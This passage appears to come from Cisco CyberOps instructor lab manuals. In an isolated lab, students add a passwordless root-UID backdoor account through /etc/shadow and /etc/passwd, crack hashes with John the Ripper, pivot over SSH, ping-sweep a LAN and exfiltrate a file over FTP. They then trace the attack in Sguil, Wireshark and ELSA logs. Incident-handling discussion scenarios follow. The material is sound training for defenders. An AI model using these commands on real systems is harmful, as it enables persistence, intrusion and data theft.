fields define the configurations for the password, such as date of last change, minimum and maximum
password age, and password expiration date. The last field is reserved for future use.
To learn more about the /etc/shadow file, enter man shadow at a terminal prompt.
j. Return to the Metasploit Framework terminal on the Kali VM. You will add a new user myroot to
Metasploitable VM. This user will have the same password configurations as root.
When creating the new user, you will use the same 9 fields as the root user; except you will delete the
encrypted password associated with the root user and leave the password field empty. When the
password field is empty, no password is needed to log in as the user myroot.
The echo command will append a new line to add the new user myroot to the /etc/shadow file.
Note: Make sure that there are two greater than signs (>) or you will overwrite the current /etc/shadow
file.
echo "myroot::14747:0:99999:7:::" >> /etc/shadow
k. Verify that you added the new user myroot to /etc/shadow.
cat /etc/shadow
<output omitted>
myroot::14747:0:99999:7:::
Why was it necessary to copy the content of /etc/shadow file to a new text file on Kali VM?
Hint: What would happen if you enter the cat /etc/shadow > /root/shadow.txt in the Metasploit
Framework console?
____________________________________________________________________________________
The /root/shadow.txt file would be saved on Metasploitable, instead of Kali VM.
l. To allow myroot to login with elevated privileges, you will add the user myroot with the same user ID
number (UID), user's group ID number (GID), user description, user home directory, and login shell as the
root to the /etc/passwd file. The colons (:) separate the fields, and the x in the second field represents

the password for the user. The encrypted password can be found in the /etc/shadow file for the same
user.
Return to the Metasploitable remote connection terminal window and enter the cat command to see the
information for root.
cat /etc/passwd | grep root
root:x:0:0:root:/root:/bin/bash
m. Use the following echo command to append the settings for myroot to /etc/password.
Note: Make sure that there are two greater than signs (>) or you will overwrite the current /etc/passwd
file.
echo "myroot:x:0:0:root:/root:/bin/bash" >> /etc/passwd
To learn more about the /etc/passwd file, enter man 5 passwd at a terminal prompt.
n. Verify that you added the new user myroot to /etc/passwd.
cat /etc/passwd
<output omitted>
myroot:x:0:0:root:/root:/bin/bash
With root access, the user myroot has complete control of Metasploitable VM.
o. Enter exit when done.
exit

[*] 209.165.200.235 - Command shell session 1 closed. Reason: Died from EOFError

msf exploit(vsftpd_234_backdoor) >

p. Press Enter and type quit to exit the Metasploit Framework console.

Part 4: Infiltration

Step 1: Crack the passwords using John the Ripper.

John the Ripper is a tool used to find weak passwords of users. In this step, you will use John the Ripper to
crack weak passwords.
a. From the Kali VM root prompt, verify that the shadow file is in the /root folder on Kali VM.
b. At the root prompt on Kali VM, enter john command to crack the passwords. Use the show option to view
cracked passwords reliably.
Note: The password cyberops was added to the /usr/share/john/password.lst file to speed up the
password cracking process.
root@kali:~# john --show /root/shadow.txt
analyst:cyberops:17338:0:99999:7:::

1 password hash cracked, 7 left

After you have cracked the password for the user analyst, you can access Metasploitable via SSH using
the login name analyst.

Step 2: Find the targeted host.

In this step, you will use different commands to find the IP address of a possible host on the internal network
behind the DMZ.
a. Establish an SSH session to the Metasploitable VM. Enter yes to accept the RSA digital signature when
connecting for the first time. Connection may take a few moments. Enter cyberops as the password
when prompted.
root@kali:~# ssh [email protected]
[email protected]'s password:
b. Verify that you have root access to Metasploitable. Enter the su -l myroot at the prompt. The option is
the lower case letter L, not the number one. Notice that the prompt has changed from
analyst@metasploitable to root@metasploitable.
analyst@metasploitable:~$ su -l myroot
root@metasploitable:~#
c. Display the /etc/shadow file.
root@metasploitable:~# cat /etc/shadow
d. Enter exit at the prompt to return to the access privileges of the user analyst.
e. Now display the /etc/shadow file as analyst.
analyst@metasploitable:~$ cat /etc/shadow
Why did you receive an error message? Record the message and explain.
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
The /etc/shadow file is only readable by the owner root and user in the group shadow, the user analyst
does not have the permission to read the file as indicated by the ls -l /etc/shadow command. It can be
read by the user myroot because myroot has root privileges.
f. Enter ifconfig to list all the network interfaces on Metasploitable.
analyst@metasploitable:~$ ifconfig
eth0 Link encap:Ethernet HWaddr 08:00:27:ab:84:07
inet addr:209.165.200.235 Bcast:209.165.200.255 Mask:255.255.255.224
inet6 addr: fe80::a00:27ff:feab:8407/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1610 errors:0 dropped:0 overruns:0 frame:0
TX packets:1550 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:117030 (114.2 KB) TX bytes:123570 (120.6 KB)
Interrupt:10 Base address:0xd020
<output omitted>
g. Enter ip route to determine the default gateway for this network.
analyst@metasploitable:~$ ip route
209.165.200.224/27 dev eth0 proto kernel scope link src 209.165.200.235
default via 209.165.200.226 dev eth0 metric 100

What is the default gateway?

____________________________________________________________________________________
209.165.200.226
h. In the same terminal window, establish another SSH session to the Security Onion VM at
209.165.200.226 (eth1 interface) as the user analyst. Enter yes to accept the RSA digital signature when
connecting for the first time. It could take a few moments to connect. Use the password cyberops when
prompted.
analyst@metasploitable:~$ ssh [email protected]
i. Enter ifconfig to view the list of network interfaces.
analyst@SecOnion:~$ ifconfig
eth0 Link encap:Ethernet HWaddr 08:00:27:c3:cd:8c
inet addr:192.168.0.1 Bcast:192.168.0.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:fec3:cd8c/64 Scope:Link
UP BROADCAST RUNNING PROMISC MULTICAST MTU:1500 Metric:1
RX packets:8 errors:0 dropped:0 overruns:0 frame:0
TX packets:64 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:656 (656.0 B) TX bytes:9377 (9.3 KB)
<output omitted>
j. You have determined the subnet for the LAN, 192.168.0.0/24. Now you will use a for loop to determine
the active hosts on the LAN. To save time, you will only ping the first 15 hosts.
analyst@SecOnion:~$ for ((i=1;i<15;i+=1)); do ping -c 2 192.168.0.$i; done
PING 192.168.0.1 (192.168.0.1) 56(84) bytes of data.
64 bytes from 192.168.0.1: icmp_seq=1 ttl=64 time=0.067 ms
64 bytes from 192.168.0.1: icmp_seq=2 ttl=64 time=0.027 ms
--- 192.168.0.1 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 999ms
rtt min/avg/max/mdev = 0.028/0.031/0.034/0.003 ms
<output omitted>
PING 192.168.0.11 (192.168.0.11) 56(84) bytes of data.
64 bytes from 192.168.0.11: icmp_seq=1 ttl=64 time=0.606 ms
64 bytes from 192.168.0.11: icmp_seq=2 ttl=64 time=0.262 ms

--- 192.168.0.11 ping statistics ---

2 packets transmitted, 2 received, 0% packet loss, time 999ms
rtt min/avg/max/mdev = 0.262/0.434/0.606/0.172 ms
<output omitted>
k. Only 192.168.0.1 (Security Onion eth0) and 192.168.0.11 (CyberOps Workstation VM) are responding to
the ping requests. Establish an SSH session into the CyberOps Workstation VM. Enter yes to accept the
RSA digital signature when connecting for the first time. Enter cyberops as the password.
analyst@SecOnion:~$ ssh 192.168.0.11

Step 3: Exfiltrate a confidential file.

You now have access to the CyberOps Workstation VM through a series of SSH sessions (Kali VM > Security
Onion VM > CyberOps Worstation VM) using the password that was cracked in a previous step. Now you will
access a confidential file and exfiltrate the content.
a. Verify that you are in the analyst's home directory. Change directory to lab.support.files.
[analyst@secOps ~]$ cd lab.support.files
b. List the files that are in the directory. Verify that confidential.txt file is in the folder.
c. Establish an FTP session to the Metasploitable VM. Use the default user analyst and enter cyberops as
the password.
[analyst@secOps lab.support.files]$ ftp 209.165.200.235
Connected to 209.165.200.235.
220 (vsFTPd 2.3.4)
Name (209.165.200.235:analyst): analyst
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
d. Upload the confidential.txt file to the Metasplolitable VM. Now you have access to the file and you can
move it to the Kali VM for your use if desired.
ftp> put confidential.txt
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
103 bytes sent in 0.000104 seconds (41.6 kbytes/s)
e. Enter quit when you have finished transferring the file.

Step 4: Encrypt the data and remove the original.

a. Threat actors often will encrypt the confidential data and store it locally, possible for ransoming later. Zip
the confidential.txt file and encrypt it. Enter cyberops as the password.
analyst@secOps lab.support.files]$ zip -e confidential.zip confidential.txt
Enter password:
Verify password:
adding: confidential.txt (deflated 4%)
b. Remove the confidential.txt file from CyberOps Workstation VM.
[analyst@secOps lab.support.files]$ rm confidential.txt
c. Enter exit three times until you are back at the root@kali:~# prompt.
d. Now the attacker can copy the file from the FTP on the Metasploitable VM to the Kali VM. This could take
a few moments. Enter the password cyberops when prompted.
root@kali:~# scp [email protected]:/home/analyst/confidential.txt ~
[email protected]'s password:
confidential.txt 100% 102 102.1KB/s 00:00

Note: You can copy the file directly from CyberOps Workstation VM to the Kali VM if there is a user
account other than root configured on Kali VM. Because FTP transmits the content in plaintext, you will
be able to view the content in packets using Wireshark.
e. If desired, you can log back into Metasploitable and remove the file confidential.txt from the FTP server.
root@kali:~# ssh [email protected]
[email protected]'s password:
analyst@metasploitable:~$ rm confidential.txt
f. At this time, you can shut down Metasploitable, CyberOps Workstation, and Kali virtual machines.

Part 5: Review the Logs

After the attack, the user analyst no longer has access to the file named confidential.txt. Now you will review
the logs to determine how the file was compromised.
Note: If this was a production network, it would be desirable for the users analyst and root to change the
password and comply with the current security policy.

Step 1: Review alerts in Squil.

a. Access the Security Onion VM. Log in with the user analyst and password cyberops, if necessary.
b. Open Sguil and log in. Click Select All and then Start SGUIL.
c. Review the Events listed in the Event Message column. Two of the messages are GPL
ATTACK_RESPONSE id check returned root. This message indicates that root access may have been
gained during an attack. The host at 209.165.200.235 returned root access to 209.165.201.17. Select the
Show Packet Data and Show Rule checkbox to view each alert in more detail.

d. Select the returned root message that is associated with Senor seconion-eth1-1 for further analysis. In
the figure below, Alert ID 5.2568 and its correlated event are used. However, your Alert ID will be most
likely be a different number.

e. Right-click the number under the CNT heading to select View Correlated Events.

f. In the new tab, right-click the Alert ID for one of the GPL ATTACK_RESPONSE id check returned root
alerts and select Transcript. The Alert ID 5.2570 is used in this example.

g. Review the transcripts for all the alerts. The latest alert in the tab is likely to display the transactions
between the Kali (threat actor) and Metasploitable (target) during the attack.

What had happened during the attack?

Step 2: Pivot to Wireshark.

a. Select the alert that provided you with the transcript from the previous step. Right-click the Alert ID and
select Wireshark. The Wireshark's main window displays 3 views of a packet.

b. To view all packets assembled in a TCP conversation, right-click any packet and select Follow TCP
Stream.

What did you observe? What do the text colors red and blue indicate?
____________________________________________________________________________________
____________________________________________________________________________________
The TCP stream shows the transaction between Kali (threat actor) displayed in red text and
Metasploitable (target) in blue text. The information from the TCP stream is the same as in the transcript.
c. Exit the TCP stream window. Close Wireshark when you are done reviewing the information provided by
Wireshark.

Step 3: Use ELSA to pivot to the Bro Logs.

b. Click bro_notice.

c. The result indicates that 209.165.201.17 was performing a port scan on 209.165.200.235, the
Metasploitable VM. The attacker probably found vulnerabilities on the Metasploitable VM to gain access.

d. If an attacker has compromised Metasploitable, you want to determine the exploit that was used and what
was accessed by the attacker.

Step 4: Return to Squil to investigate attack.

c. In the new tab with all the correlated events, right-click the Alert ID and select Transcript to view each
alert in more detail. Alert ID 5.2569 is used as an example. The latest alert is likely to display the TCP
transmission between the attacker and victim.

d. You can also right-click the Alert ID and select Wireshark to review and save the pcap file and TCP
stream.

Step 5: Use ELSA to view exfiltrated data.

a. To use ELSA for more information about the same alert as above, right-click either the source or
destination IP address and select ELSA IP Lookup > DstIP.
b. Click bro_ftp to view ELSA logs that are related to FTP.

c. Which file was transferred via FTP to 209.165.200.235? Whose account was used to transfer the file?
____________________________________________________________________________________
The file confidential.txt was transferred by the user analyst.

d. Click info to view the transactions in the last record. The reply_msg field indicates that this is the last
entry for the transfer of the confidential.txt file. Click Plugin > getPcap. Enter username analyst and
password cyberops when prompted. Click Submit if necessary. CapMe is a web interface that allows
you to get a pcap transcript and download the pcap.

The pcap transcript is rendered using tcpflow, and this page also provides the link to access the pcap file.

e. To determine the content of the file that was compromised, open ELSA by double clicking the icon on the
Desktop to open a new tab and perform a new search.

f. Expand FTP and click FTP Data. Click one of the Info links and select getPcap from the dropdown menu
to determine the content of the stolen file.

g. The result displays the content of the file named confidential.txt that was transferred to the FTP server.

Step 6: Clean up
Shut down all VMs when finished.

Reflection
In this lab, you have used a vulnerability to gain access to unauthorized information and reviewed the logs as
a cybersecurity analyst. Now summarize your findings.
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________

From the Sguil and ELSA logs, it was determined that an attacker at 209.165.201.17 exploited the vsftpd
vulnerability to gain root access to 209.165.200.235. By using root access gained from the attack, the attacker
had added a new root user myroot for future root access. The attacker compromised the user analyst to gain
to access an internal workstation, 192.168.0.11. By using the analyst account, the attacker was able to gain
access to the file named confidential.txt and transfer the file using FTP to 209.165.200.235, where the
attacker has remote access to retrieve the file.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 20 of 20 www.netacad.com
Lab – Incident Handling (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

Objectives
Apply your knowledge of security incident handling procedures to formulate questions about given incident
scenarios.

Background / Scenario
Computer security incident response has become a vital part of any organization. The process for handling a
security incident can be complicated and involve many different groups. An organization must have standards
for responding to incidents in the form of policies, procedures, and checklists. To properly respond to a
security incident, the security analyst must be trained to understand what to do, and must also follow all of the
guidelines outlined by the organization. There are many resources available to help organizations create and
maintain a computer incident response handling policy, but the NIST Special Publication 800-61 is specifically
called by the CCNA CyberOps SECOPS exam topics. This publication can be found here:
http://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-61r2.pdf

Scenario 1: Worm and Distributed Denial of Service (DDoS) Agent Infestation

Study the following scenario and discuss and determine the incident response handling questions that should
be asked at each stage of the incident response process. Consider the details of the organization and the
CSIRC when formulating your questions.
This scenario is about a small, family-owned investment firm. The organization has only one location and less
than 100 employees. On a Tuesday morning, a new worm is released; it spreads itself through removable
media, and it can copy itself to open Windows shares. When the worm infects a host, it installs a DDoS agent.
It was several hours after the worm started to spread before antivirus signatures became available. The
organization had already incurred widespread infections.
The investment firm has hired a small team of security experts who often use the diamond model of security
incident handling.
Preparation:
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Answers will vary especially based upon the CSIRC details. Examples:
Would the organization consider this activity to be an incident? If so, which of the organization’s policies does
this activity violate?
What measures are in place to attempt to prevent this type of incident from re-occurring, or to limit its impact?

Detection and Analysis:

_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Answers will vary especially based upon the CSIRC details. Examples:
What precursors of the incident, if any, might the organization detect? Would any precursors cause the
organization to take action before the incident occurred?
What indicators of the incident might the organization detect? Which indicators would cause someone to think
that an incident might have occurred?
What additional tools might be needed to detect this particular incident?
How would the team prioritize the handling of this incident?
Containment, Eradication, and Recovery:
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Answers will vary especially based upon the CSIRC details. Examples:
What strategy should the organization take to contain the incident? Why is this strategy preferable to others?
What additional tools might be needed to respond to this particular incident?
Which personnel would be involved in the containment, eradication, and/or recovery processes?
What sources of evidence, if any, should the organization acquire? How would the evidence be acquired?
Where would it be stored? How long should it be retained?
Post-Incident Activity:
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Answers will vary based upon the CSIRC details. Examples:

What could be done to prevent similar incidents from occurring in the future?
What could be done to improve detection of similar incidents?

Scenario 2: Unauthorized Access to Payroll Records

Study the following scenario. Discuss and determine the incident response handling questions that should be
asked at each stage of the incident response process. Consider the details of the organization and the CSIRC
when formulating your questions.
This scenario is about a mid-sized hospital with multiple satellite offices and medical services. The
organization has dozens of locations employing more than 5000 employees. Because of the size of the
organization, they have adopted a CSIRC model with distributed incident response teams. They also have a
coordinating team that watches over the CSIRTs and helps them to communicate with each other.
On a Wednesday evening, the organization’s physical security team receives a call from a payroll
administrator who saw an unknown person leave her office, run down the hallway, and exit the building. The
administrator had left her workstation unlocked and unattended for only a few minutes. The payroll program is
still logged in and on the main menu, as it was when she left it, but the administrator notices that the mouse
appears to have been moved. The incident response team has been asked to acquire evidence related to the
incident and to determine what actions were performed.
The security teams practice the kill chain model and they understand how to use the VERIS database. For an
extra layer of protection, they have partially outsourced staffing to an MSSP for 24/7 monitoring.
Preparation:
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Answers will vary based upon the CSIRC details. Examples:
Would the organization consider this activity to be an incident? If so, which of the organization’s policies does
this activity violate?
What measures are in place to attempt to prevent this type of incident from occurring or to limit its impact?
Detection and Analysis:
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Answers will vary based upon the CSIRC details. Examples:
What precursors of the incident, if any, might the organization detect? Would any precursors cause the
organization to take action before the incident occurred?

What indicators of the incident might the organization detect? Which indicators would cause someone to think
that an incident might have occurred?
What additional tools might be needed to detect this particular incident?
How would the team prioritize the handling of this incident?
Containment, Eradication, and Recovery:
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Answers will vary based upon the CSIRC details. Examples:
What strategy should the organization take to contain the incident? Why is this strategy preferable to others?
What additional tools might be needed to respond to this particular incident?
Which personnel would be involved in the containment, eradication, and/or recovery processes?
What sources of evidence, if any, should the organization acquire? How would the evidence be acquired?
Where would it be stored? How long should it be retained?
Post-Incident Activity:
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Answers will vary based upon the CSIRC details. Examples:
What could be done to prevent similar incidents from occurring in the future?
What could be done to improve detection of similar incidents?